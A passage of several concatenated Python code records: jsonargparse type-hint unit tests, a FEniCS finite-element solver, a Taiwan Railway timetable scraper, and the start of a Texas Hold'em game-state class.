parser.add_argument('--op', type=Class)\n cfg = parser.parse_args([\n f'--op={module}.Class',\n f'--op.{full}p1=1',\n f'--op.{full}cal=calendar.TextCalendar',\n f'--op.{full}cal.{full}firstweekday=2',\n ])\n self.assertEqual(cfg.op.class_path, f'{module}.Class')\n self.assertEqual(cfg.op.init_args.p1, 1)\n self.assertEqual(cfg.op.init_args.cal.class_path, 'calendar.TextCalendar')\n self.assertEqual(cfg.op.init_args.cal.init_args, Namespace(firstweekday=2))\n\n\n def test_class_type_dict_default_nested_init_args(self):\n class Data:\n def __init__(self, p1: int = 1, p2: str = 'x', p3: bool = False):\n pass\n\n with mock_module(Data) as module:\n parser = ArgumentParser()\n parser.add_argument('--data', type=Data)\n parser.set_defaults({'data': {'class_path': f'{module}.Data'}})\n cfg = parser.parse_args([\n f'--data.init_args.p1=2',\n f'--data.init_args.p2=y',\n f'--data.init_args.p3=true',\n ])\n self.assertEqual(cfg.data.init_args, Namespace(p1=2, p2='y', p3=True))\n\n\n def test_class_type_subclass_nested_help(self):\n class Class:\n def __init__(self, cal: Calendar, p1: int = 0):\n self.cal = cal\n\n parser = ArgumentParser()\n parser.add_argument('--op', type=Class)\n\n for pattern in [r'[\\s=]', r'\\s']:\n with self.subTest('\" \"' if '=' in pattern else '\"=\"'), mock_module(Class) as module:\n out = StringIO()\n args = re.split(pattern, f'--op.help={module}.Class 
--op.init_args.cal.help=TextCalendar')\n with redirect_stdout(out), self.assertRaises(SystemExit):\n parser.parse_args(args)\n self.assertIn('--op.init_args.cal.init_args.firstweekday', out.getvalue())\n\n with self.subTest('invalid'), mock_module(Class) as module:\n err = StringIO()\n with redirect_stderr(err), self.assertRaises(SystemExit):\n parser.parse_args([f'--op.help={module}.Class', '--op.init_args.p1=1'])\n self.assertIn('Expected a nested --*.help option', err.getvalue())\n\n\n def test_class_type_unresolved_parameters(self):\n class Class:\n def __init__(self, p1: int = 1, p2: str = '2', **kwargs):\n self.kwargs = kwargs\n\n with mock_module(Class) as module:\n config = f\"\"\"cls:\n class_path: {module}.Class\n init_args:\n p1: 5\n dict_kwargs:\n p2: '6'\n p3: 7.0\n p4: x\n \"\"\"\n expected = Namespace(\n class_path=f'{module}.Class',\n init_args=Namespace(p1=5, p2='6'),\n dict_kwargs={'p3': 7.0, 'p4': 'x'},\n )\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--config', action=ActionConfigFile)\n parser.add_argument('--cls', type=Class)\n\n cfg = parser.parse_args([f'--config={config}'])\n self.assertEqual(cfg.cls, expected)\n cfg_init = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg_init.cls, Class)\n self.assertEqual(cfg_init.cls.kwargs, expected.dict_kwargs)\n\n cfg = parser.parse_args(['--cls=Class', '--cls.dict_kwargs.p4=x', '--cls.dict_kwargs.p3=7.0'])\n self.assertEqual(cfg.cls.dict_kwargs, expected.dict_kwargs)\n\n with self.assertRaises(ParserError):\n parser.parse_args(['--cls=Class', '--cls.dict_kwargs=1'])\n\n out = StringIO()\n with redirect_stdout(out), self.assertRaises(SystemExit):\n parser.parse_args([f'--config={config}', '--print_config'])\n data = yaml.safe_load(out.getvalue())['cls']\n self.assertEqual(data, expected.as_dict())\n\n\n def test_class_type_unresolved_name_clash(self):\n class Class:\n def __init__(self, dict_kwargs: int = 1, **kwargs):\n self.kwargs = kwargs\n\n with mock_module(Class) as module:\n parser = ArgumentParser()\n parser.add_argument('--cls', type=Class)\n args = [f'--cls={module}.Class', '--cls.dict_kwargs=2']\n cfg = parser.parse_args(args)\n self.assertEqual(cfg.cls.init_args.as_dict(), {'dict_kwargs': 2})\n args.append('--cls.dict_kwargs.p1=3')\n cfg = parser.parse_args(args)\n self.assertEqual(cfg.cls.init_args.as_dict(), {'dict_kwargs': 2})\n self.assertEqual(cfg.cls.dict_kwargs, {'p1': 3})\n\n\n def test_invalid_init_args_in_yaml(self):\n config = \"\"\"cal:\n class_path: calendar.Calendar\n init_args:\n \"\"\"\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--config', action=ActionConfigFile)\n parser.add_argument('--cal', type=Calendar)\n self.assertRaises(ParserError, lambda: parser.parse_args([f'--config={config}']))\n\n\n def test_typehint_serialize_list(self):\n parser = ArgumentParser()\n action = parser.add_argument('--list', type=Union[PositiveInt, List[PositiveInt]])\n self.assertEqual([1, 2], action.serialize([PositiveInt(1), PositiveInt(2)]))\n self.assertRaises(ValueError, lambda: action.serialize([1, -2]))\n\n\n def test_typehint_serialize_enum(self):\n\n class MyEnum(Enum):\n a = 1\n b = 2\n\n parser = ArgumentParser()\n action = parser.add_argument('--enum', type=Optional[MyEnum])\n self.assertEqual('b', action.serialize(MyEnum.b))\n self.assertRaises(ValueError, lambda: action.serialize('x'))\n\n\n def test_unsupported_type(self):\n self.assertRaises(ValueError, lambda: ActionTypeHint(typehint=lambda: None))\n self.assertRaises(ValueError, lambda: 
ActionTypeHint(typehint=Union[int, lambda: None]))\n\n\n def test_nargs_questionmark(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('p1')\n parser.add_argument('p2', nargs='?', type=OpenUnitInterval)\n self.assertIsNone(parser.parse_args(['a']).p2)\n self.assertEqual(0.5, parser.parse_args(['a', '0.5']).p2)\n self.assertRaises(ParserError, lambda: parser.parse_args(['a', 'b']))\n\n\n def test_register_type(self):\n\n def serializer(v):\n return v.isoformat()\n\n def deserializer(v):\n return datetime.strptime(v, '%Y-%m-%dT%H:%M:%S')\n\n register_type(datetime, serializer, deserializer)\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--datetime', type=datetime)\n cfg = parser.parse_args(['--datetime=2008-09-03T20:56:35'])\n self.assertEqual(cfg.datetime, datetime(2008, 9, 3, 20, 56, 35))\n self.assertEqual(parser.dump(cfg), \"datetime: '2008-09-03T20:56:35'\\n\")\n self.assertRaises(ValueError, lambda: register_type(datetime))\n register_type(uuid.UUID)\n\n\n def test_lazy_instance_invalid_kwargs(self):\n class MyClass:\n def __init__(self, param: int = 1):\n pass\n\n self.assertRaises(ValueError, lambda: lazy_instance(MyClass, param='bad'))\n\n\n def test_dump_skip_default(self):\n class MyCalendar(Calendar):\n def __init__(self, *args, param: str = '0', **kwargs):\n super().__init__(*args, **kwargs)\n\n with mock_module(MyCalendar) as module:\n parser = ArgumentParser()\n parser.add_argument('--g1.op1', default=1)\n parser.add_argument('--g1.op2', default='abc')\n parser.add_argument('--g2.op1', type=Callable, default=deepcopy)\n parser.add_argument('--g2.op2', type=Calendar, default=lazy_instance(Calendar, firstweekday=2))\n\n cfg = parser.get_defaults()\n dump = parser.dump(cfg, skip_default=True)\n self.assertEqual(dump, '{}\\n')\n\n cfg.g2.op2.class_path = f'{module}.MyCalendar'\n dump = parser.dump(cfg, skip_default=True)\n self.assertEqual(dump, f'g2:\\n op2:\\n class_path: {module}.MyCalendar\\n init_args:\\n firstweekday: 2\\n')\n\n cfg.g2.op2.init_args.firstweekday = 0\n dump = parser.dump(cfg, skip_default=True)\n self.assertEqual(dump, f'g2:\\n op2:\\n class_path: {module}.MyCalendar\\n')\n\n parser.link_arguments('g1.op1', 'g2.op2.init_args.firstweekday')\n parser.link_arguments('g1.op2', 'g2.op2.init_args.param')\n del cfg['g2.op2.init_args']\n dump = parser.dump(cfg, skip_default=True)\n self.assertEqual(dump, f'g2:\\n op2:\\n class_path: {module}.MyCalendar\\n')\n\n\nclass TypeHintsTmpdirTests(TempDirTestCase):\n\n def test_path(self):\n os.mkdir(os.path.join(self.tmpdir, 'example'))\n rel_yaml_file = os.path.join('..', 'example', 'example.yaml')\n abs_yaml_file = os.path.realpath(os.path.join(self.tmpdir, 'example', rel_yaml_file))\n with open(abs_yaml_file, 'w') as output_file:\n output_file.write('file: '+rel_yaml_file+'\\ndir: '+self.tmpdir+'\\n')\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--cfg', action=ActionConfigFile)\n parser.add_argument('--file', type=Path_fr)\n parser.add_argument('--dir', type=Path_drw)\n parser.add_argument('--files', nargs='+', type=Path_fr)\n\n cfg = parser.parse_args(['--cfg', abs_yaml_file])\n self.assertEqual(self.tmpdir, os.path.realpath(cfg.dir()))\n self.assertEqual(rel_yaml_file, str(cfg.file))\n self.assertEqual(abs_yaml_file, os.path.realpath(cfg.file()))\n\n cfg = parser.parse_args(['--cfg', 'file: '+abs_yaml_file+'\\ndir: '+self.tmpdir+'\\n'])\n self.assertEqual(self.tmpdir, os.path.realpath(cfg.dir()))\n self.assertEqual(abs_yaml_file, 
os.path.realpath(cfg.file()))\n\n cfg = parser.parse_args(['--file', abs_yaml_file, '--dir', self.tmpdir])\n self.assertEqual(self.tmpdir, os.path.realpath(cfg.dir()))\n self.assertEqual(abs_yaml_file, os.path.realpath(cfg.file()))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--dir', abs_yaml_file]))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--file', self.tmpdir]))\n\n cfg = parser.parse_args(['--files', abs_yaml_file, abs_yaml_file])\n self.assertTrue(isinstance(cfg.files, list))\n self.assertEqual(2, len(cfg.files))\n self.assertEqual(abs_yaml_file, os.path.realpath(cfg.files[-1]()))\n\n\n def test_list_path(self):\n parser = ArgumentParser()\n parser.add_argument('--paths', type=List[Path_fc])\n cfg = parser.parse_args(['--paths=[\"file1\", \"file2\"]'])\n self.assertEqual(['file1', 'file2'], cfg.paths)\n self.assertIsInstance(cfg.paths[0], Path)\n self.assertIsInstance(cfg.paths[1], Path)\n\n\n def test_optional_path(self):\n pathlib.Path('file_fr').touch()\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--path', type=Optional[Path_fr])\n self.assertIsNone(parser.parse_args(['--path=null']).path)\n cfg = parser.parse_args(['--path=file_fr'])\n self.assertEqual('file_fr', cfg.path)\n self.assertIsInstance(cfg.path, Path)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--path=not_exist']))\n\n\n def test_enable_path(self):\n data = {'a': 1, 'b': 2, 'c': [3, 4]}\n cal = {'class_path': 'calendar.Calendar'}\n with open('data.yaml', 'w') as f:\n json.dump(data, f)\n with open('cal.yaml', 'w') as f:\n json.dump(cal, f)\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--data', type=Dict[str, Any], enable_path=True)\n parser.add_argument('--cal', type=Calendar, enable_path=True)\n cfg = parser.parse_args(['--data=data.yaml'])\n self.assertEqual('data.yaml', str(cfg['data'].pop('__path__')))\n self.assertEqual(data, cfg['data'])\n cfg = parser.instantiate_classes(parser.parse_args(['--cal=cal.yaml']))\n self.assertIsInstance(cfg['cal'], Calendar)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--data=does-not-exist.yaml']))\n\n\n def test_default_path_unregistered_type(self):\n parser = ArgumentParser()\n parser.add_argument('--path',\n type=path_type('drw', skip_check=True),\n default=Path('test', mode='drw', skip_check=True))\n cfg = parser.parse_args([])\n self.assertEqual('path: test\\n', parser.dump(cfg))\n out = StringIO()\n parser.print_help(out)\n self.assertIn('(type: Path_drw_skip_check, default: test)', out.getvalue())\n\n\n def test_class_type_with_default_config_files(self):\n config = {\n 'class_path': 'calendar.Calendar',\n 'init_args': {'firstweekday': 3},\n }\n config_path = os.path.join(self.tmpdir, 'config.yaml')\n with open(config_path, 'w') as f:\n json.dump({'data': {'cal': config}}, f)\n\n class MyClass:\n def __init__(self, cal: Optional[Calendar] = None, val: int = 2):\n self.cal = cal\n\n parser = ArgumentParser(error_handler=None, default_config_files=[config_path])\n parser.add_argument('--op', default='from default')\n parser.add_class_arguments(MyClass, 'data')\n\n cfg = parser.get_defaults()\n self.assertEqual(config_path, str(cfg['__default_config__']))\n self.assertEqual(cfg.data.cal.as_dict(), config)\n dump = parser.dump(cfg)\n self.assertIn('class_path: calendar.Calendar\\n', dump)\n self.assertIn('firstweekday: 3\\n', dump)\n\n cfg = parser.parse_args([])\n self.assertEqual(cfg.data.cal.as_dict(), config)\n cfg = 
parser.parse_args(['--data.cal.class_path=calendar.Calendar'], defaults=False)\n self.assertEqual(cfg.data.cal, Namespace(class_path='calendar.Calendar'))\n\n\n def test_class_path_override_with_default_config_files(self):\n\n class MyCalendar(Calendar):\n def __init__(self, *args, param: str = '0', **kwargs):\n super().__init__(*args, **kwargs)\n\n with mock_module(MyCalendar) as module:\n config = {\n 'class_path': f'{module}.MyCalendar',\n 'init_args': {'firstweekday': 2, 'param': '1'},\n }\n config_path = os.path.join(self.tmpdir, 'config.yaml')\n with open(config_path, 'w') as f:\n json.dump({'cal': config}, f)\n\n parser = ArgumentParser(error_handler=None, default_config_files=[config_path])\n parser.add_argument('--cal', type=Optional[Calendar])\n\n cfg = parser.instantiate_classes(parser.get_defaults())\n self.assertIsInstance(cfg['cal'], MyCalendar)\n\n with warnings.catch_warnings(record=True) as w:\n cfg = parser.parse_args(['--cal={\"class_path\": \"calendar.Calendar\", \"init_args\": {\"firstweekday\": 3}}'])\n self.assertIn(\"discarding init_args: {'param': '1'}\", str(w[0].message))\n self.assertEqual(cfg.cal.init_args, Namespace(firstweekday=3))\n self.assertEqual(type(parser.instantiate_classes(cfg)['cal']), Calendar)\n\n\n def test_mapping_class_typehint(self):\n class A:\n pass\n\n class B:\n def __init__(\n self,\n class_map: Mapping[str, A],\n int_list: List[int],\n ):\n self.class_map = class_map\n self.int_list = int_list\n\n with mock_module(A, B) as module:\n parser = ArgumentParser(error_handler=None)\n parser.add_class_arguments(B, 'b')\n\n config = {\n 'b': {\n 'class_map': {\n 'one': {'class_path': f'{module}.A'},\n },\n 'int_list': [1],\n },\n }\n\n cfg = parser.parse_object(config)\n self.assertEqual(cfg.b.class_map, {'one': Namespace(class_path=f'{module}.A')})\n self.assertEqual(cfg.b.int_list, [1])\n\n cfg_init = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg_init.b, B)\n self.assertIsInstance(cfg_init.b.class_map, dict)\n self.assertIsInstance(cfg_init.b.class_map['one'], A)\n\n config['b']['int_list'] = config['b']['class_map']\n self.assertRaises(ParserError, lambda: parser.parse_object(config))\n\n\n def test_subcommand_with_subclass_default_override_lightning_issue_10859(self):\n\n class Arch:\n def __init__(self, a: int = 1):\n pass\n\n class ArchB(Arch):\n def __init__(self, a: int = 2, b: int = 3):\n pass\n\n class ArchC(Arch):\n def __init__(self, a: int = 4, c: int = 5):\n pass\n\n parser = ArgumentParser(error_handler=None)\n parser_subcommands = parser.add_subcommands()\n subparser = ArgumentParser()\n subparser.add_argument('--arch', type=Arch)\n\n with mock_module(Arch, ArchB, ArchC) as module:\n default = {'class_path': f'{module}.ArchB'}\n value = {'class_path': f'{module}.ArchC', 'init_args': {'a': 10, 'c': 11}}\n\n subparser.set_defaults(arch=default)\n parser_subcommands.add_subcommand('fit', subparser)\n\n with warnings.catch_warnings(record=True) as w:\n cfg = parser.parse_args(['fit', f'--arch={json.dumps(value)}'])\n self.assertIn(\"discarding init_args: {'b': 3}\", str(w[0].message))\n self.assertEqual(cfg.fit.arch.as_dict(), value)\n\n\nclass OtherTests(unittest.TestCase):\n\n def test_is_optional(self):\n class MyEnum(Enum):\n A = 1\n\n params = [\n (Optional[bool], bool, True),\n (Union[type(None), bool], bool, True),\n (Dict[bool, type(None)], bool, False),\n (Optional[Path_fr], Path, True),\n (Union[type(None), Path_fr], Path, True),\n (Dict[Path_fr, type(None)], Path, False),\n (Optional[MyEnum], Enum, True),\n 
(Union[type(None), MyEnum], Enum, True),\n (Dict[MyEnum, type(None)], Enum, False),\n ]\n\n for typehint, ref_type, expected in params:\n with self.subTest(str(typehint)):\n self.assertEqual(expected, is_optional(typehint, ref_type))\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","sub_path":"jsonargparse_tests/test_typehints.py","file_name":"test_typehints.py","file_ext":"py","file_size_in_byte":48718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
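The record above is jsonargparse's type-hint test suite. As a minimal, hedged sketch of the core pattern those tests exercise (annotate add_argument with a typing hint and let the parser coerce command-line strings into typed values), assuming only that jsonargparse is installed; the option names here are invented:

from typing import List, Optional
from jsonargparse import ArgumentParser

parser = ArgumentParser()
parser.add_argument('--threshold', type=Optional[float])  # accepts a float or 'null'
parser.add_argument('--ids', type=List[int])              # accepts a JSON/YAML-style list

cfg = parser.parse_args(['--threshold=0.5', '--ids=[1, 2, 3]'])
assert cfg.threshold == 0.5 and cfg.ids == [1, 2, 3]
assert parser.parse_args(['--threshold=null']).threshold is None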
+{"seq_id":"124832999","text":"from mshr import *\nfrom dolfin import *\n\nimport sys\nimport numpy as np\nfrom scipy import interpolate\nfrom matplotlib import pyplot as plt\n\nimport time\nimport csv\nimport png\nfrom PIL import Image\n#set_log_level(ERROR)\nset_log_level(40)\n\n\nimport gc\n\n############################################## \n# Partial Differential Equation: #\n# #\n# { div( a * grad(u) ) = f on Interior #\n# { u = 0 on Boundary #\n# #\n##############################################\n\n# Solves PDE defined above using the Finite Element Method; retrieves the\n# mesh and coefficient data from the files generated by 'mesh.py' and 'data.py'\n#def FEM_solver(resolution, mesh_resolution, mesh_directory, data_directory, solution_directory, mesh_ID, stiffness_ID, source_ID):\ndef FEM_solver(resolution, mesh_resolution, mesh_ID, data_ID, use_hires=False):\n #set_log_level(ERROR)\n set_log_level(40)\n # Identifying label for saving files\n #ID_label = str(mesh_ID) + '_' + str(data_ID)\n ID_label = str(data_ID)\n \n # Specifiy file containing mesh\n mesh_filename = './Meshes/mesh_' + str(mesh_ID) + '.xml'\n\n # Recover mesh from file\n mesh = Mesh(mesh_filename)\n V = FunctionSpace(mesh, 'Lagrange', 1)\n\n # Create square mesh\n square_mesh = UnitSquareMesh(resolution-1,resolution-1)\n square_V = FunctionSpace(square_mesh, 'CG', 1)\n\n # Specify files containing stiffness/source function data\n #stiffness_function_filename = stiff_dir + 'stiff_function_' + str(stiff_ID) + '.xml'\n data_function_filename = './Data/data_' + str(data_ID) + '.xml'\n coeff_function_filename = './Data/coeff_' + str(data_ID) + '.xml'\n \n \n solution_function_filename = './Solutions/solution_' + ID_label + '.xml'\n solution_filename = './Solutions/solution_' + ID_label + '.npy'\n hires_solution_filename = './Solutions/hires_solution_' + ID_label + '.npy'\n\n # Recover mesh from file\n #mesh = Mesh(mesh_filename)\n #V = FunctionSpace(mesh, 'Lagrange', 1)\n\n # Define mesh on unit square\n \"\"\"\n square_domain = Rectangle(Point(-1.0,-1.0),Point(1.0,1.0))\n square_mesh = generate_mesh(square_domain,mesh_resolution)\n square_V = FunctionSpace(square_mesh, 'Lagrange', 1)\n \"\"\"\n #square_mesh = UnitSquareMesh(resolution-1,resolution-1)\n #square_V = FunctionSpace(square_mesh, 'CG', 1)\n\n\n # Project stiffness term onto mesh\n a_function = Function(square_V, coeff_function_filename)\n a = project(a_function, V)\n\n # Use constant stiffness term\n #a = Constant('1.0')\n\n # Project source term onto mesh\n f_function = Function(square_V, data_function_filename)\n f = project(f_function, V)\n\n \n # Define boundary conditions\n u0 = Constant(0.0)\n def u0_boundary(x, on_boundary):\n return on_boundary\n bc = DirichletBC(V, u0, u0_boundary)\n\n # Define variational problem\n u = TrialFunction(V)\n v = TestFunction(V)\n \n #\n # Used to Interpolate New Data\n #\n \n #ti = np.linspace(-1.0, 1.0,resolution)\n #x = ti\n #y = ti\n #z = np.random.uniform(0.0,10.0,(resolution,resolution))\n #approximate = interpolate.RectBivariateSpline(x,y,z)\n #print('Interpolation Completed')\n #mesh_points = mesh.coordinates()\n #print(mesh_points)\n\n #a = Function(V)\n #a_vector = a.vector()\n #a_array = np.array(a_vector.array())\n #vals_shape = a_array.shape\n #vals_size = a_array.size\n\n #vals = np.zeros((vals_size,))\n #for k in range(0,vals_size):\n # vals[k] = approximate.ev(mesh_points[k][0], mesh_points[k][1])\n\n #print(vals)\n\n #vals = np.random.uniform(0.0,1.0,vals_shape)\n 
#a.vector().set_local(np.array(vals))\n\n\n # Identity matrix for diagonal stiffness term\n I_mat = Expression((('1.0','0.0'),\n ('0.0','1.0')), degree=2)\n\n #g = Expression('1.0', degree=0)\n # Weak Formulation Integrand\n #A = inner(a*I_mat*nabla_grad(u), nabla_grad(v))*dx\n A = inner(a*I_mat*nabla_grad(u), nabla_grad(v))*dx\n L = f*v*dx\n\n # Compute Solution\n u = Function(V)\n solve(A == L, u, bc)\n\n\n # Compute min/max of solution\n #u_array = u.vector().array()\n #u_max = u_array.max()\n #u_min = u_array.min()\n\n # Save solution as Fenics Function\n #File(solution_function_filename) << u\n \n # Compute Norms\n #L2norm = norm(u, 'L2', mesh)\n #H1norm = norm(u, 'H1', mesh)\n\n\n\n step = 1.0/resolution\n start = 0.0 + step/2.0\n \n \n vals = np.zeros([resolution,resolution])\n for i in range(0,resolution):\n for j in range(0,resolution):\n x_coord = start + i*step\n y_coord = start + (resolution - 1 - j)*step\n pt = Point(x_coord, y_coord)\n cell_id = mesh.bounding_box_tree().compute_first_entity_collision(pt)\n #if mesh.bounding_box_tree().collides(pt):\n if cell_id < mesh.num_cells():\n try:\n # Interior points can be evaluated directly\n vals[j,i] = u(pt)\n except:\n # Points near the boundary have issues due to rounding...\n cell = Cell(mesh, cell_id)\n coords = cell.get_vertex_coordinates()\n new_x_coord = coords[0]\n new_y_coord = coords[1]\n new_pt = Point(new_x_coord, new_y_coord)\n vals[j,i] = u(new_pt)\n \n np.save(solution_filename, vals)\n\n\n\n if use_hires:\n ## Save hi-res solution array\n new_resolution = 2*resolution\n new_step = 1.0/new_resolution\n new_start = 0.0 + new_step/2.0\n\n\n new_vals = np.zeros([new_resolution,new_resolution])\n for i in range(0,new_resolution):\n for j in range(0,new_resolution):\n x_coord = new_start + i*new_step\n y_coord = new_start + (new_resolution - 1 - j)*new_step\n pt = Point(x_coord, y_coord)\n cell_id = mesh.bounding_box_tree().compute_first_entity_collision(pt)\n #if mesh.bounding_box_tree().collides(pt):\n if cell_id < mesh.num_cells():\n try:\n # Interior points can be evaluated directly\n new_vals[j,i] = u(pt)\n except:\n # Points near the boundary have issues due to rounding...\n cell = Cell(mesh, cell_id)\n coords = cell.get_vertex_coordinates()\n new_x_coord = coords[0]\n new_y_coord = coords[1]\n new_pt = Point(new_x_coord, new_y_coord)\n new_vals[j,i] = u(new_pt)\n\n np.save(hires_solution_filename, new_vals)\n\n\n \n # Cleanup to avoid continual memory increase\n #del_list = [mesh, V, square_mesh, square_V, f, f_function, u, vals, new_vals]\n #del del_list\n #gc.collect()\n \n\n\ndef gen_soln(current_data, total_count, resolution, mesh_resolution, use_hires=False):\n #set_log_level(ERROR)\n set_log_level(40)\n time_step = 1\n step = 0\n #progress = ' [ Estimated Time ~ N/A ]'\n #start_time = time.clock()\n #count = 1\n #total_count = current_mesh*current_data\n #total_count = current_data\n\n \n for i in range(0,1):\n for j in range(current_data, current_data + total_count):\n step += 1\n #sys.stdout.flush()\n FEM_solver(resolution, mesh_resolution, j, j, use_hires=use_hires)\n #gc.collect()\n #count +=1\n #print('\\n\\n')\n\n \n","sub_path":"Variable_Coefficient/Setup/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":7679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
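solver.py above assembles a standard FEniCS weak form for div(a*grad(u)) = f with zero Dirichlet boundary values, then samples the solution on a pixel grid by point evaluation. For reference, a stripped-down sketch of the same solve, assuming a legacy FEniCS/dolfin installation; a constant coefficient and source stand in for the projected data functions:

from dolfin import (Constant, DirichletBC, Function, FunctionSpace, Point,
                    TestFunction, TrialFunction, UnitSquareMesh, dx, inner,
                    nabla_grad, solve)

mesh = UnitSquareMesh(16, 16)
V = FunctionSpace(mesh, 'Lagrange', 1)
u, v = TrialFunction(V), TestFunction(V)
bc = DirichletBC(V, Constant(0.0), lambda x, on_boundary: on_boundary)
a, f = Constant(1.0), Constant(1.0)   # placeholders for the coefficient/source data
A = inner(a * nabla_grad(u), nabla_grad(v)) * dx
L = f * v * dx
u = Function(V)
solve(A == L, u, bc)
print(u(Point(0.5, 0.5)))             # point evaluation, as in the grid-sampling loop above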
+{"seq_id":"290767560","text":"#臺灣鐵路班次爬蟲\r\nimport requests\r\nimport json\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nclass train():\r\n\r\n train_url = 'http://twtraffic.tra.gov.tw/twrail/TW_Quicksearch.aspx'\r\n\r\n def __init__(self, input_str):\r\n self.input_str = []\r\n self.input_str.append(''.join(input_str[0].replace(\"台\", \"臺\")))\r\n self.input_str.append(''.join(input_str[1].replace(\"台\", \"臺\")))\r\n self.input_str.append(input_str[2])\r\n print(\"self.input_str length:\" + str(len(self.input_str)))\r\n print(\"train input:\" + str(self.input_str))\r\n\r\n def get_train_number(self):\r\n myheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\"}\r\n try:\r\n resp = requests.get(self.train_url, headers=myheaders)\r\n resp.encoding = 'utf-8'\r\n soup = BeautifulSoup(resp.text, 'html.parser')\r\n except BaseException as e:\r\n print(\"Exception at train get, \" + str(e))\r\n return ''\r\n\r\n station_values = []\r\n for value in soup.find_all('input', attrs={'name': 'FromStationName'}):\r\n station_values.append(value['value'])\r\n\r\n station_names = []\r\n for name in soup.find_all('label', class_='stationradiolabel'):\r\n station_names.append(name.text.replace(' ', ''))\r\n\r\n str_from_station_name = ''\r\n str_to_station_name = ''\r\n for i, value in enumerate(station_values):\r\n if self.input_str[0] in station_names[i]:\r\n str_from_station_name = value\r\n if self.input_str[1] in station_names[i]:\r\n str_to_station_name = value\r\n\r\n if str_from_station_name == '' or str_to_station_name == '':\r\n print(\"no from station or no to station\\nfrom station:\" + str_from_station_name +\r\n \", to station:\" + str_to_station_name)\r\n return ''\r\n\r\n date = self.input_str[2].strftime('%Y-%m-%d')\r\n hour = self.input_str[2].strftime('%H')\r\n minute = \"00\"\r\n time = hour + minute\r\n\r\n form_data = {\r\n 'FromStationName': str_from_station_name,\r\n 'ToStationName': str_to_station_name,\r\n 'TrainClass': '2',\r\n 'searchdate': date,\r\n 'FromTimeSelect': time,\r\n 'ToTimeSelect': '2359',\r\n 'Timetype': '1'\r\n }\r\n\r\n search_url = \"http://twtraffic.tra.gov.tw/twrail/TW_SearchResult.aspx\"\r\n post_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\"}\r\n try:\r\n resp = requests.post(search_url, data=form_data, headers=post_headers)\r\n resp.encoding = 'utf-8'\r\n soup = BeautifulSoup(resp.text, 'html.parser')\r\n except BaseException as e:\r\n print(\"Exception at train post, \" + str(e))\r\n return ''\r\n\r\n rows = soup.find_all('script')\r\n train_data = []\r\n for row in rows:\r\n train_data.append(row.text)\r\n\r\n if len(train_data) < 12:\r\n print(\"The length of train_date is less than 12\")\r\n return ''\r\n text = json.loads(train_data[11].rstrip(\";\").lstrip(\"var JSONData=\"))\r\n return_str = \"台灣鐵路 [{}] 到 [{}] 班次資訊:\\n\".format(self.input_str[0], self.input_str[1])\r\n return_str += \"車次 開車時間 到達時間\\n\"\r\n for i in range(len(text)):\r\n if i > 4:\r\n break\r\n return_str += \"{:>4} {:>10} {:>12}\\n\".format(\r\n text[i]['Train_Code'], text[i]['From_Departure_Time'], text[i]['To_Arrival_Time'])\r\n #print(return_str)\r\n return return_str\r\n","sub_path":"train_crawler.py","file_name":"train_crawler.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"311423089","text":"#!/bin/python\n#coding:utf-8\nimport roomai.common\nimport copy\n\nclass TexasHoldemPublicState(roomai.common.AbstractPublicState):\n '''\n The public state of TexasHoldem\n '''\n def __init__(self):\n self.__stage__ = None\n self.__num_players__ = None\n self.__dealer_id__ = None\n self.__public_cards__ = None\n self.__big_blind_bet__ = None\n\n #state of players\n self.__is_fold__ = None\n self.__num_fold__ = None\n self.__is_allin__ = None\n self.__num_allin__ = None\n self.__is_needed_to_action__ = None\n self.__num_needed_to_action__ = None\n\n\n #chips is array which contains the chips of all players\n self.__chips__ = None\n\n #bets is array which contains the bets from all players\n self.__bets__ = None\n\n #max_bet = max(self.bets)\n self.__max_bet_sofar__ = None\n #the raise acount\n self.__raise_account__ = None\n\n def __get_num_players__(self): return self.__num_players__\n num_players = property(__get_num_players__, doc = \"The number of players in this game\")\n\n def __get_max_bet_sofar__(self): return self.__max_bet_sofar__\n max_bet_sofar = property(__get_max_bet_sofar__, doc=\"The max bet used by one player so far\")\n\n def __get_raise_account__(self): return self.__raise_account__\n raise_account = property(__get_raise_account__, doc=\"The raise account. If a player want to raise, the price must be max_bet_sofar + raise_account * N. The raise account will increases as the game goes forward\")\n\n def __get_chips__(self):\n if self.__chips__ is None:\n return None\n else:\n return tuple(self.__chips__)\n chips = property(__get_chips__, doc = \"chips is an array of the chips of all players. For example, chips=[50,50,50]\")\n\n def __get_bets__(self):\n if self.__bets__ is None:\n return None\n else:\n return tuple(self.__bets__)\n bets = property(__get_bets__, doc = \"bets is an array which contains the bets from all players. For example, bets=[50,25,25]\")\n\n def __get_big_blind_bet__(self): return self.__big_blind_bet__\n big_blind_bet = property(__get_big_blind_bet__, doc=\"The big blind bet\")\n\n def __get_is_fold__(self):\n if self.__is_fold__ is None: return None\n else: return tuple(self.__is_fold__)\n is_fold = property(__get_is_fold__, doc=\"is_fold is an array of which player has take the fold action. For example, is_fold = [true,true,false] denotes the player0 and player1 have taken the fold action\")\n\n def __get_num_fold__(self):\n return self.__num_fold__\n num_fold = property(__get_num_fold__, doc = \"The number of players who has taken the fold action\")\n\n def 